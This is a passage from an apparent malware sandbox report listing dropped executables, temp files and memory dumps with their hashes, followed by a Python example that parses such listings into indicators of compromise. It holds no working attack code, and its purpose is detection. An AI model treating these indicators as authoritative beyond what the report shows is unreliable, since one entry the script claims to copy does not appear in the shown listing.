SHA512 483c4c7098dcb3e91674380a74fc6b04eb495cc88016068250c2d4641f8ac961b738f504474d7d1ba0cdf7b8285f04357cdb45d4b0e9fbb0ffa9b8fe63921bf5

C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue07ef9e317e0f6ae.exe

MD5 63c74efb44e18bc6a0cf11e4d496ca51
SHA1 04a8ed3cf2d1b29b644fbb65fee5a3434376dfa0
SHA256 be76e36b5b66b15087662720d920e31d1bc718f4ed0861b97f10ef85bfb09f3c
SHA512 7cba62ff083db883cd172f6104b149bf3cf0b8836407d88093efff8d7bd4bc21ea4f3c951448f1c57b9eb33ca849a86731a2ac4d9c81793456e7ed009e20e402

memory/4068-164-0x0000000000000000-mapping.dmp

memory/276-166-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue07a633a94f9.exe

MD5 b7f786e9b13e11ca4f861db44e9fdc68
SHA1 bcc51246a662c22a7379be4d8388c2b08c3a3248
SHA256 f8987faadabfe4fd9c473ac277a33b28030a7c2a3ea20effc8b27ae8df32ddf6
SHA512 53185e79e9027e87d521aef18488b57b900d3415ee132c3c058ed49c5918dd53a6259463c976928e463ccc1e058d1c9c07e86367538c6bed612ede00c6c0f1a5

memory/216-168-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue07b3bf87d8.exe

MD5 7b3895d03448f659e2934a8f9b0a52ae
SHA1 084dc9cd061c5fb90bfc17a935d9b6ca8947a33c
SHA256 898149d20045702c1bf0c4e552a907c763912d4e5d9cf5b348e1aae80928b097
SHA512 dcc1a140f364d7428fcf3ca85613a911524eb7872ef9076c89a8252fa16cefcdd3fe6d355c857585f8cea8f3e00a43f7ea088c296ecdb3012179db148cc6b25d

memory/2268-170-0x0000000000000000-mapping.dmp

memory/3160-172-0x0000000000000000-mapping.dmp

memory/1828-174-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue07e35cf558.exe

MD5 210ee72ee101eca4bcbc50f9e450b1c2
SHA1 efea2cd59008a311027705bf5bd6a72da17ee843
SHA256 ccecc31183a26f9949252d33a8207f4e3ddb5a38fa1fbcbd22d7521942a40669
SHA512 8a6eacb4fb610ffb9457025e031824167a5cc6abe4f25168022ead62f6735b43a5e0f72a11d3efdb590f4f583d382d094789530d219113654d1db76c4be50a05

C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue07caa83bac5d15.exe

MD5 7068e518575e5ab430815e14b33dd36e
SHA1 887df192fecd39a1c607ffe7552c573f25b9fda3
SHA256 1e4689aea99a6ddcf887e310d985013eb748d6b5cd30a81ec1a26ef154cd0cbd
SHA512 587d711bada21b2421f1a5ddb0beb004a17298c59751f633fd69b0e58983cbc38e0d0992e4ce0a98390aef887f7b81470e7027ff0901431a92b0bf897f7f2f6f

C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue07267c17f2f5.exe

MD5 b4dd1caa1c9892b5710b653eb1098938
SHA1 229e1b7492a6ec38d240927e5b3080dd1efadf4b
SHA256 6a617cd85f6e4fa3861d97d1f8197e909f6ca895a1c6139171d26068656a4c95
SHA512 6285d20d85c2ca38c8dbb92bc8985371cddc9dbe042128e0cc6a48b24e52e5990a196b424a59aa84e551b67c91f5f58894dca2b9c5b130ea78076768e15ecae8

C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue07816149b72db00.exe

MD5 e20af8a334c27be684628d541b873a28
SHA1 ff88b3b58868256dfe9b47cdfad1f01be35f03ca
SHA256 d2b05eb480172829409440309b1f64977040a47c0b11f36d56801fcec8b6dde6
SHA512 041acadcde92cdccd76450b8cf512f0efb8bcfca142166bfdbd7f093e695fc948aef621c1a41ad8cf3e280b04ef441ec581367fb9a60e1aa821deb0f548ff401

memory/3192-180-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue071e59dc8292b4ef1.exe

MD5 b915b5247a3a217eb3cf0996ba2f9378
SHA1 f0ed113a152c1469b1174c9e18abf0a60d240347
SHA256 2a0f230c4a784be4418d778bc8fd8dab23345a5224545480a32d3b0383d5b9ba
SHA512 ba6f7cbfa498c4fcfda7624b2e8dbe3600f953180398bf485e07caedf808bf8f35c44f2009e8e4a95c60e75f09a5028c542ce2a757cd4b778c741ae4285daea8

memory/4088-185-0x0000000000000000-mapping.dmp

memory/4416-184-0x0000000000000000-mapping.dmp

memory/3128-182-0x0000000000000000-mapping.dmp

memory/4668-183-0x0000000000000000-mapping.dmp

memory/4408-178-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue070aab9bc86b572.exe

MD5 82a9f8a4b7f7fcc967913bfeb63cfeba
SHA1 87366553ff702c334300151132ab956dbb803e5d
SHA256 59d466a488da2270d0ae53d9ad035c283a4ce08252bcfec8b65301a930875910
SHA512 bef4b52ab24d47a3c50615ce72c733485419ed84f686d48e77928a46be4ef078883351b68a446c0e9ce52c02a25945cb1d6c44cc04c1cdd5de7c66408ac75e2c

memory/4464-176-0x0000000000000000-mapping.dmp

memory/4764-187-0x0000000000000000-mapping.dmp

memory/1492-191-0x0000000000000000-mapping.dmp

memory/4048-188-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue0750373995e75.exe

MD5 5ac2df074a0e97b559cc5cc3f75b1805
SHA1 df6c2a71a936ef1776cf45877c87ed7b3974e015
SHA256 fde1639a2d7bff05994cf6dbaf8a46db57fa8c9ba8b4227e5da048c0b31d0d8b
SHA512 7150b7a26a68a94bd664e36be26cc1a0179a302c0b73dd627940c336f0f395a0835bbbbbf1cece0c993b2b4f0acd4ee20713dbe77b8de7916bedeaf7b9330529

memory/912-192-0x0000000000000000-mapping.dmp

memory/1392-198-0x0000000000000000-mapping.dmp

memory/4216-201-0x0000000000000000-mapping.dmp

memory/3128-215-0x0000000002E90000-0x0000000002EC6000-memory.dmp

memory/2052-218-0x0000000000E50000-0x0000000000F5E000-memory.dmp

memory/828-217-0x0000000000000000-mapping.dmp

memory/764-216-0x0000000000000000-mapping.dmp

memory/800-214-0x0000000000DD0000-0x0000000000E00000-memory.dmp

memory/3852-211-0x0000000000000000-mapping.dmp

memory/800-210-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue07006d6b7c.exe

MD5 2fa10132cfbce32a5ac7ee72c3587e8b
SHA1 30d26416cd5eef5ef56d9790aacc1272c7fba9ab
SHA256 cfb5c20ec8d95c35f7edb8743084d4491e43c62c575cf0102b4f6781c50689de
SHA512 4e9338f89229bdddb5d7c803a415a338a75962e61ef47984a67efd1e81824ac14039d9abe2b26992a30f6d26c724058518849d71b6d1948c00b08ae95b0fd25a

memory/2008-204-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue078a285ef7.exe

MD5 3c95af8f6495e8378f0cd823d134f79f
SHA1 f2719e53eef24c8d415722963b116a754f27b6ee
SHA256 a5bd395e719ccaba9376f81b3b171ec1d1b8c3b43e63d12c578ebefb37a9dee1
SHA512 ba28c3cae074bc63509763f5fbb8c38b0ecf15cef517a7a0a33f781b62657804322935949ab6d0a368e1d6286d65571b2d47f726359fb38b4064f82d8fac15f2

memory/4048-200-0x0000000000400000-0x000000000046D000-memory.dmp

memory/2052-193-0x0000000000000000-mapping.dmp

memory/2052-220-0x00000000057C0000-0x000000000585C000-memory.dmp

memory/3128-223-0x00000000057E0000-0x0000000005E08000-memory.dmp

memory/4088-225-0x00007FF98CBD0000-0x00007FF98D691000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue0741bc096fd881d2.exe

MD5 9421bc53d00ce19532a4a0d73c759c0a
SHA1 09591d5782da6b20af28ba46189903792f663ef9
SHA256 bd3d796fabf7921062cae667e211fd5f1ba04b8a2629af74191211472bde8b62
SHA512 56979f8f34a459a2691dbc1d48ca5fed05000d02b0aa773903e5f8d919a291292ce16875c485cc96a12b650f2a764d052bb9b1da2da8d85e7ff2665ddf4aedc3

memory/2196-219-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\is-BF9RV.tmp\Tue07e35cf558.tmp

MD5 6020849fbca45bc0c69d4d4a0f4b62e7
SHA1 5be83881ec871c4b90b4bf6bb75ab8d50dbfefe9
SHA256 c6c796f0d37e1a80632a295122db834499017b8d07728e0b5dfa6325ed3cab98
SHA512 f4c359a9ebf362b943d10772efe9cfd0a0153c1ff866ffdf1223e16e544dfa2250f67e7a7682d2558761d36efe15c7de1a2c311bc67b162eb77394ef179924eb

memory/2052-226-0x0000000005E10000-0x00000000063B4000-memory.dmp

memory/4048-228-0x0000000000400000-0x000000000046D000-memory.dmp

memory/764-230-0x0000000000FD0000-0x0000000001042000-memory.dmp

memory/2052-229-0x0000000005900000-0x0000000005992000-memory.dmp

memory/1664-231-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\is-IPSE1.tmp\idp.dll

MD5 8f995688085bced38ba7795f60a5e1d3
SHA1 5b1ad67a149c05c50d6e388527af5c8a0af4343a
SHA256 203d7b61eac96de865ab3b586160e72c78d93ab5532b13d50ef27174126fd006
SHA512 043d41947ab69fc9297dcb5ad238acc2c35250d1172869945ed1a56894c10f93855f0210cbca41ceee9efb55fd56a35a4ec03c77e252409edc64bfb5fb821c35

memory/2052-234-0x0000000005870000-0x000000000587A000-memory.dmp

memory/2052-236-0x0000000005A90000-0x0000000005AE6000-memory.dmp

memory/5064-238-0x0000000000000000-mapping.dmp

memory/764-233-0x0000000005840000-0x00000000058B6000-memory.dmp

memory/4132-235-0x0000000000000000-mapping.dmp

memory/3128-240-0x00000000054C0000-0x00000000054E2000-memory.dmp

memory/764-239-0x00000000057E0000-0x00000000057FE000-memory.dmp

memory/4212-195-0x0000000000000000-mapping.dmp

memory/4088-194-0x0000000000770000-0x0000000000778000-memory.dmp

memory/3128-241-0x0000000005660000-0x00000000056C6000-memory.dmp

memory/3128-242-0x0000000005E80000-0x0000000005EE6000-memory.dmp

memory/4048-243-0x0000000000400000-0x000000000046D000-memory.dmp

memory/912-244-0x0000000002D9A000-0x0000000002DAB000-memory.dmp

memory/912-245-0x0000000002FF0000-0x0000000002FF9000-memory.dmp

memory/4704-246-0x0000000000000000-mapping.dmp

memory/3496-247-0x0000000064940000-0x0000000064959000-memory.dmp

memory/912-248-0x0000000000400000-0x0000000002B91000-memory.dmp

memory/3496-250-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/3496-249-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/3496-251-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/3852-252-0x0000000000400000-0x0000000002BFB000-memory.dmp

memory/3128-254-0x0000000006470000-0x000000000648E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe

MD5 b4dd1caa1c9892b5710b653eb1098938
SHA1 229e1b7492a6ec38d240927e5b3080dd1efadf4b
SHA256 6a617cd85f6e4fa3861d97d1f8197e909f6ca895a1c6139171d26068656a4c95
SHA512 6285d20d85c2ca38c8dbb92bc8985371cddc9dbe042128e0cc6a48b24e52e5990a196b424a59aa84e551b67c91f5f58894dca2b9c5b130ea78076768e15ecae8

memory/852-253-0x0000000000000000-mapping.dmp

memory/4416-257-0x00000000050B0000-0x00000000056C8000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751

MD5 ec8ff3b1ded0246437b1472c69dd1811
SHA1 d813e874c2524e3a7da6c466c67854ad16800326
SHA256 e634c2d1ed20e0638c95597adf4c9d392ebab932d3353f18af1e4421f4bb9cab
SHA512 e967b804cbf2d6da30a532cbc62557d09bd236807790040c6bee5584a482dc09d724fc1d9ac0de6aa5b4e8b1fff72c8ab3206222cc2c95a91035754ac1257552

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751

MD5 57ca7a471a850ca44286b7178100217f
SHA1 be1063f106a778f03bdda03507ad0a07044b552d
SHA256 a04ca28a3d932874a9e24596d7bd988b72081741d0fc087e26fcad8f768435f8
SHA512 4637b16cde486949f2db09d209a17f8d93cff70a61c2e813e10937dfc3c6c96ba0c1548bc51b285197502a949775ab56a4c9452b1f3b01734adeadfe431003bf

memory/4132-263-0x0000000002D20000-0x0000000002D68000-memory.dmp

memory/2712-262-0x0000000000000000-mapping.dmp

memory/2712-264-0x0000000000400000-0x0000000000422000-memory.dmp

memory/4132-261-0x0000000002E2A000-0x0000000002E53000-memory.dmp

memory/856-260-0x0000000000000000-mapping.dmp

memory/4416-266-0x0000000002680000-0x0000000002692000-memory.dmp

memory/4416-267-0x00000000056D0000-0x00000000057DA000-memory.dmp

memory/4132-269-0x0000000000400000-0x0000000002BA9000-memory.dmp

memory/1784-268-0x0000000000000000-mapping.dmp

memory/4416-273-0x0000000000400000-0x00000000004C6000-memory.dmp

memory/4416-271-0x00000000057E0000-0x000000000581C000-memory.dmp

memory/4416-272-0x0000000000720000-0x0000000000750000-memory.dmp

memory/4416-270-0x000000000084D000-0x0000000000870000-memory.dmp

memory/3852-274-0x0000000002E0A000-0x0000000002E86000-memory.dmp

memory/912-275-0x0000000000400000-0x0000000002B91000-memory.dmp

memory/3852-276-0x0000000003170000-0x0000000003244000-memory.dmp

memory/2900-277-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\sqlite.dll

MD5 e7232d152ca0bf8e9e69cfbe11b231f6
SHA1 9c00ea3d8b2ccfb24b9fbd1772944ea26b5bb0f5
SHA256 dd19804b5823cf2cab3afe4a386b427d9016e2673e82e0f030e4cff74ef73ce1
SHA512 3d87325fbea81b4559d435725e58670222d12478bdbc10dd97033c6f3e06314de89b7b5fa27881a9020a0395fa861c5e992f61f99b3271c4ac7e8616bd0d3bbf

memory/3232-279-0x0000000000000000-mapping.dmp

memory/4736-280-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\sqlite.dat

MD5 6ae0b51959eec1d47f4caa7772f01f48
SHA1 eb797704b1a33aea85824c3da2054d48b225bac7
SHA256 ecdfa028928da8df647ece7e7037bc4d492b82ff1870cc05cf982449f2c41786
SHA512 06e837c237ba4bbf766fd1fc429b90ea2093734dfa93ad3be4e961ef7cfc7ba70429b4e91e59b1ec276bb037b4ede0e0fa5d33875596f53065c5c25d1b8f3340

memory/3852-284-0x0000000000400000-0x0000000002BFB000-memory.dmp

memory/2344-283-0x0000000000000000-mapping.dmp

memory/3596-285-0x0000000000000000-mapping.dmp

memory/3128-286-0x0000000005230000-0x0000000005262000-memory.dmp

memory/3128-287-0x000000006F660000-0x000000006F6AC000-memory.dmp

memory/3128-288-0x0000000005210000-0x000000000522E000-memory.dmp

memory/4088-289-0x00007FF98CBD0000-0x00007FF98D691000-memory.dmp

memory/1772-290-0x0000000000000000-mapping.dmp

memory/3972-291-0x0000000000000000-mapping.dmp

memory/2252-292-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\YlrXm6o.Qz

MD5 d6aedc1a273d5ef177c98b54e50c4267
SHA1 73d3470851f92d6707113c899b60638123f16658
SHA256 dd969062741750bbf11521a55b502684dbc014d18248101fca62e02e4316c28f
SHA512 66d88585061caf419626d1d14ac86377f1a55bc087e49aeae0c22addb337656b9b7f6b7aa3fbe02d88d21da44aaf53c78e2d4c6ec1df3a5aae96b7add3477c75

C:\Users\Admin\AppData\Local\Temp\yW7bB.DeE

MD5 ac6ad5d9b99757c3a878f2d275ace198
SHA1 439baa1b33514fb81632aaf44d16a9378c5664fc
SHA256 9b8db510ef42b8ed54a3712636fda55a4f8cfcd5493e20b74ab00cd4f3979f2d
SHA512 bfcdcb26b6f0c288838da7b0d338c2af63798a2ece9dcd6bc07b7cadf44477e3d5cfbba5b72446c61a1ecf74a0bccc62894ea87a40730cd1d4c2a3e15a7bb55b

C:\Users\Admin\AppData\Local\Temp\jNyesn.Co

MD5 9d8e799afa0154a3810fbb9d6b7347b8
SHA1 fc2f14fa5e3e88425de45448105bfa7f388f84bf
SHA256 aac5ad388c316408b26689b11e7b2e82abcd15cf8fca306d99abac98c8758949
SHA512 26f82b043528a838233ebe985c85910530aa19fe7c3420838e1e3e5ad874ae187060b0c6b5239bc04d46dae8f689da430d26e1c12aeebe282c52b625158e6524

memory/4892-299-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\uts09Z.aiZ

MD5 6c0b054306eb927a9b1e0033173f5790
SHA1 66df535f466617f793a9e060f5a46666bb9c6392
SHA256 41116baaa2e68b5c4f6edb633a71a1ad0b2b3c93b734c8042e81ca555871f5fc
SHA512 a1e1c8f0a03b49de6aee73471c2e2547c42a3fc9c619436125c5c51bb6cfaced2866fc1aacc9094cc752be01fffcbdb74c15e225e9fcf2b77ad30481ea21bedb

C:\Users\Admin\AppData\Local\Temp\eZZS.MDf

MD5 c46b8fe99ab0f1c42eaa760c5a377e89
SHA1 08520470250526bf45ad69fc19229d192a0f8a2e
SHA256 8e9c962e3ac853d70a35a9045470be907058df734d169c6f09766096de236aac
SHA512 fa869c01eb1161b049a34dc145c4fc65b22fbf67a9aeacb5f13920e4ed6773190677b8d21b286fdaeabedcfd7390fb1dc418dcb4dfcdb3c164dd670602c63197

C:\Users\Admin\AppData\Local\Temp\3UIi17.uI

MD5 6991612597b1769596e681d10a4b970a
SHA1 eea55ffb9cf1f44c30ae9a14aec2dd7020a5c231
SHA256 899a2d886577c8f76223486d8e0f3098526bcd30fd851071ff8e3ebe945c81c8
SHA512 aaa0c80446d6c10e4fef40038811cd65dbe8f26258d23f2b5633d1efa2eb0cd78b323b62770820aa609973c164be12de7912f0c70fabb7d35bb49c42bbf8a2af

memory/3532-300-0x0000000000000000-mapping.dmp

memory/4132-301-0x0000000002E2A000-0x0000000002E53000-memory.dmp

memory/4416-302-0x000000000084D000-0x0000000000870000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\FUEj5.QM

MD5 b635e91e65b8f10796eaacd4d81546db
SHA1 260d173ab64accf4949dea116b4a7201938f64ac
SHA256 f251910ac2a9169e02f333e75f6c36e22b3f9cb03c4ccf48ba5d864046ce1580
SHA512 04d76adf8038d7337ccc1289980fc2e586cff61c17358508dc3c0dbdc95ddec24edc3ea329cdea1d9024fae628a4722c4b42d3a2b7319dbb625de02c6b24572d

C:\Users\Admin\AppData\Local\Temp\FUEJ5.QM

MD5 b635e91e65b8f10796eaacd4d81546db
SHA1 260d173ab64accf4949dea116b4a7201938f64ac
SHA256 f251910ac2a9169e02f333e75f6c36e22b3f9cb03c4ccf48ba5d864046ce1580
SHA512 04d76adf8038d7337ccc1289980fc2e586cff61c17358508dc3c0dbdc95ddec24edc3ea329cdea1d9024fae628a4722c4b42d3a2b7319dbb625de02c6b24572d

memory/3532-305-0x0000000002FD0000-0x00000000030AE000-memory.dmp

memory/3532-306-0x0000000003160000-0x000000000320B000-memory.dmp

memory/3532-307-0x0000000003210000-0x00000000032B5000-memory.dmp

memory/3532-308-0x0000000002F20000-0x0000000002FB2000-memory.dmp

memory/2264-311-0x0000000000000000-mapping.dmp

memory/1848-312-0x0000000000000000-mapping.dmp

memory/3128-313-0x0000000007DD0000-0x000000000844A000-memory.dmp

memory/3128-315-0x0000000007780000-0x000000000779A000-memory.dmp

memory/3128-316-0x0000000007800000-0x000000000780A000-memory.dmp

memory/3128-317-0x0000000007A00000-0x0000000007A96000-memory.dmp

memory/1848-318-0x00000000033B0000-0x000000000348E000-memory.dmp

memory/1848-319-0x0000000003490000-0x000000000353B000-memory.dmp

memory/3968-322-0x0000000000000000-mapping.dmp

memory/3968-323-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2248-320-0x0000000000000000-mapping.dmp

memory/3128-325-0x00000000079C0000-0x00000000079CE000-memory.dmp

memory/3128-326-0x0000000007AC0000-0x0000000007ADA000-memory.dmp

memory/3128-327-0x0000000007AA0000-0x0000000007AA8000-memory.dmp

memory/1848-328-0x0000000003540000-0x00000000035E5000-memory.dmp

memory/1848-329-0x00000000035F0000-0x0000000003682000-memory.dmp

memory/2180-335-0x0000000000000000-mapping.dmp

memory/4356-336-0x0000000000000000-mapping.dmp

memory/1360-337-0x0000000000000000-mapping.dmp

memory/4464-338-0x0000000000000000-mapping.dmp

memory/3140-339-0x0000000000000000-mapping.dmp

memory/3848-340-0x0000000000000000-mapping.dmp

memory/4796-341-0x0000000000000000-mapping.dmp

memory/2620-342-0x0000000000000000-mapping.dmp

memory/4376-343-0x0000000000000000-mapping.dmp

memory/4108-347-0x0000000000000000-mapping.dmp

memory/4040-346-0x0000000000000000-mapping.dmp

memory/1244-354-0x0000000000400000-0x00000000008F0000-memory.dmp

memory/116-350-0x0000000000400000-0x00000000008EF000-memory.dmp

memory/2624-356-0x0000000000400000-0x00000000008ED000-memory.dmp

memory/287544-378-0x0000000000400000-0x0000000000420000-memory.dmp

memory/283080-384-0x0000000000400000-0x0000000000420000-memory.dmp

memory/318876-386-0x0000000000400000-0x000000000041C000-memory.dmp

memory/319356-397-0x0000000002620000-0x0000000002834000-memory.dmp

memory/6052-406-0x0000000000400000-0x0000000000430000-memory.dmp

memory/319004-420-0x000000000D9D0000-0x000000000DA93000-memory.dmp

memory/6728-421-0x00007FF980400000-0x00007FF980E36000-memory.dmp

memory/319356-425-0x0000000002540000-0x0000000002600000-memory.dmp

memory/7536-426-0x0000000000400000-0x0000000000411000-memory.dmp

memory/7536-428-0x0000000000400000-0x0000000000411000-memory.dmp

memory/319356-432-0x0000000002C10000-0x0000000002CBB000-memory.dmp

memory/7536-431-0x0000000000400000-0x0000000000411000-memory.dmp

memory/9880-461-0x00007FF980400000-0x00007FF980E36000-memory.dmp

memory/9916-462-0x0000000000400000-0x000000000045C000-memory.dmp

memory/10016-466-0x00007FF980400000-0x00007FF980E36000-memory.dmp

memory/10636-470-0x0000000000400000-0x0000000000409000-memory.dmp

memory/10916-475-0x0000000140000000-0x0000000140684000-memory.dmp

memory/11288-481-0x0000000000400000-0x0000000000420000-memory.dmp
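Added example (not part of the sandbox report): the Files listing above is a flat run of dropped-file paths, each followed by its MD5, SHA1, SHA256 and SHA512, with memory-dump entries interleaved. The Python below parses that layout into records, collapses the entries the report repeats, groups every path written with the same bytes (7zSC7D63726\Tue07267c17f2f5.exe and SkVPVS3t6Y8W.EXe above carry identical digests, so one payload was re-dropped under a second name), validates digest lengths, and separates the dumped memory ranges by PID. The embedded excerpt copies three entries and two memory lines from the listing; the regular expressions, the function names and the set of MinGW runtime DLLs treated as weak indicators are this example's own assumptions.

```python
"""Added example: parse a sandbox report's flat Files listing into IOC records."""
import re
from collections import defaultdict

# Constructed input: three entries and two memory lines copied from the listing above.
REPORT_EXCERPT = r"""
C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\Tue07267c17f2f5.exe

MD5 b4dd1caa1c9892b5710b653eb1098938
SHA1 229e1b7492a6ec38d240927e5b3080dd1efadf4b
SHA256 6a617cd85f6e4fa3861d97d1f8197e909f6ca895a1c6139171d26068656a4c95
SHA512 6285d20d85c2ca38c8dbb92bc8985371cddc9dbe042128e0cc6a48b24e52e5990a196b424a59aa84e551b67c91f5f58894dca2b9c5b130ea78076768e15ecae8

memory/3128-215-0x0000000002E90000-0x0000000002EC6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe

MD5 b4dd1caa1c9892b5710b653eb1098938
SHA1 229e1b7492a6ec38d240927e5b3080dd1efadf4b
SHA256 6a617cd85f6e4fa3861d97d1f8197e909f6ca895a1c6139171d26068656a4c95
SHA512 6285d20d85c2ca38c8dbb92bc8985371cddc9dbe042128e0cc6a48b24e52e5990a196b424a59aa84e551b67c91f5f58894dca2b9c5b130ea78076768e15ecae8

memory/852-253-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\7zSC7D63726\libwinpthread-1.dll

MD5 1e0d62c34ff2e649ebc5c372065732ee
SHA1 fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA512 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61
"""

HASH_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}
PATH_RE = re.compile(r"^[A-Za-z]:\\")            # assumption: entries are Windows drive paths
HASH_RE = re.compile(r"^(MD5|SHA1|SHA256|SHA512)\s+([0-9a-fA-F]+)$")
MEM_RE = re.compile(r"^memory/(\d+)-(\d+)-0x([0-9A-Fa-f]+)-(?:0x([0-9A-Fa-f]+)-memory|mapping)\.dmp$")
# Assumption: stock MinGW runtime DLLs; a hash match on these alone is weak evidence.
GENERIC_RUNTIME_DLLS = {"libgcc_s_dw2-1.dll", "libstdc++-6.dll", "libwinpthread-1.dll"}
_basename = lambda p: p.rsplit("\\", 1)[-1].lower()


def parse_listing(text):
    """Return (files, dumps): file dicts {path, MD5, SHA1, ...} and memory-dump dicts."""
    files, dumps, current = [], [], None
    for line in (ln.strip() for ln in text.splitlines()):
        if not line:
            continue
        if PATH_RE.match(line):                    # a path starts a new file record
            current = {"path": line}
            files.append(current)
        elif (m := HASH_RE.match(line)):           # digest lines attach to the open record
            algo, digest = m.group(1), m.group(2).lower()
            if current is None or len(digest) != HASH_LEN[algo]:
                raise ValueError(f"bad or orphaned {algo} line: {line!r}")
            current[algo] = digest
        elif (m := MEM_RE.match(line)):            # memory/<pid>-<seq>-<start>-<end>-memory.dmp
            pid, seq, start, end = m.groups()       # or -mapping.dmp, which has no end address
            dumps.append({"pid": int(pid), "seq": int(seq), "start": int(start, 16),
                          "end": int(end, 16) if end else None})
            current = None
        else:
            raise ValueError(f"unrecognised line: {line!r}")
    return files, dumps


def unique_by_sha256(files):
    """One record per SHA256 with every path it was written to; digest conflicts raise."""
    by_hash = {}
    for f in files:
        if "SHA256" not in f:
            raise ValueError(f"no SHA256 for {f['path']}")
        rec = by_hash.setdefault(f["SHA256"], {"paths": []})
        for algo in HASH_LEN:
            if algo in f:
                if rec.get(algo, f[algo]) != f[algo]:
                    raise ValueError(f"{algo} conflict under SHA256 {f['SHA256']}")
                rec[algo] = f[algo]
        if f["path"] not in rec["paths"]:           # drop verbatim repeats of an entry
            rec["paths"].append(f["path"])
    return by_hash


def renamed_payloads(unique):
    """SHA256s written under more than one file name (same bytes, new name)."""
    return {h: r["paths"] for h, r in unique.items()
            if len({_basename(p) for p in r["paths"]}) > 1}


def strong_indicators(unique):
    """Hashes worth sweeping for: anything not seen only as a generic runtime DLL."""
    return {h for h, r in unique.items()
            if not all(_basename(p) in GENERIC_RUNTIME_DLLS for p in r["paths"])}


def regions_by_pid(dumps):
    """PID -> sorted distinct (start, end) ranges; mapping-only entries carry no range."""
    out = defaultdict(set)
    for d in dumps:
        if d["end"] is not None:
            out[d["pid"]].add((d["start"], d["end"]))
    return {pid: sorted(r) for pid, r in out.items()}


if __name__ == "__main__":
    files, dumps = parse_listing(REPORT_EXCERPT)
    uniq = unique_by_sha256(files)
    print(len(files), "entries ->", len(uniq), "distinct; renamed:", renamed_payloads(uniq))
    print("sweep for:", strong_indicators(uniq), "regions:", regions_by_pid(dumps))
```

Run it as a script against the excerpt, or pass the whole Files section to parse_listing. When the output becomes a host sweep, weight matches on the Tue07*.exe digests far above matches on libgcc_s_dw2-1.dll, libstdc++-6.dll and libwinpthread-1.dll: those are stock MinGW-w64 runtime redistributables that ship with plenty of benign software, so a hit on them alone says little. The -mapping.dmp entries carry no address range, which is why regions_by_pid skips them.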